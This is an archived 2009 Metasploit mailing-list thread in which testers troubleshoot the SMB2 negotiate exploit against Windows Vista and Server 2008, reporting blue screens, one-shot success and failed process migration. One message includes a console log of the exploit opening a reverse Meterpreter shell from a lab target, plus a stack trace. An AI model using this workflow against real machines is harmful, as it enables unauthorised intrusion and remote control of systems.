Metasploit mailing list archives

Metasploit 3.3 Development Updates


From: mtgarden at gmail.com (Matt Gardenghi)
Date: Tue, 29 Sep 2009 12:16:13 -0400

Is this caused by DEP?  That might explain the successful exploit but
failure to migrate....

On Tue, Sep 29, 2009 at 12:08 PM, David Gomes <skysbsb at gmail.com> wrote:

I have tried against Windows Vista and successfully exploited the vulnerability.
However, I can't migrate to another process, and I can't exploit this same
vulnerability twice.

msf exploit(smb2_negotiate_func_index) > exploit

[*] Connecting to the target (10.10.0.38:445)...
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (10.10.0.55:4444 -> 10.10.0.38:64969)

meterpreter > ps

Process list
============
    3952  Explorer.EXE                 C:\Windows\Explorer.EXE
...

meterpreter > migrate 3952
[*] Migrating to 3952...


^C[-] Error while running command migrate:
meterpreter > ps
[-] Error running command ps: undefined method `write' for nil:NilClass
/pentest/exploits/framework3/lib/rex/socket/ssl_tcp.rb:97:in `write'
/pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:59:in `send_packet'
/pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:92:in `send_packet_wait_response'
/pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:69:in `send_request'
/pentest/exploits/framework3/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:216:in `get_processes'
/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:190:in `cmd_ps'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'
/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:123:in `call'
/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:123:in `run'
/pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'
/pentest/exploits/framework3/lib/msf/base/sessions/meterpreter.rb:203:in `_interact'
/pentest/exploits/framework3/lib/rex/ui/interactive.rb:48:in `interact'
/pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/core.rb:1007:in `cmd_sessions'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:127:in `run'
./msfconsole:82
meterpreter > exit

msf exploit(smb2_negotiate_func_index) > exploit

[*] Connecting to the target (10.10.0.38:445)...
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...

[*] Exploit completed, but no session was created.

On Tue, Sep 29, 2009 at 11:02 AM, Danilo Nascimento <danilo.nascimento.c at gmail.com> wrote:

I can't exploit VMs in VirtualBox against Windows Server 2008
Enterprise/Standard (no updates) and Windows Vista Business en SP1 on
an x86 host and guest OS. I've tried enabling/disabling the PAE/NX option,
but a BSOD occurred when I ran the exploit.

Which VM application are you using? When I have some free time I'll
test in VMware ESXi and Xen.

This exploit works fine against physical machines (Vista SP1 and
Windows Server 2008) for me; the problem is that I can't migrate to
another process (Explorer.exe) and I can exploit only once.

Danilo Nascimento



On Tue, Sep 29, 2009 at 9:01 AM, HD Moore <hdm at metasploit.com> wrote:
On Tue, 2009-09-29 at 12:42 +0200, Giorgio Casali wrote:

Unfortunately I tried it against a Vista SP2 Enterprise and the exploit
failed, while on a Vista SP2 Ultimate I ended up with a BSOD.
Any idea where I should look?

We're seeing reports of it failing about 50/50 with physical machines and
working almost always with VMs - either way we need to dig into it and
do a little more work. Thanks for the feedback!

-HD

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework





--
David Gomes Guimarães,
Undergraduate in Computer Science - UFG,
Intern, networking area - CERCOMP/UFG.





-- 
Matt Gardenghi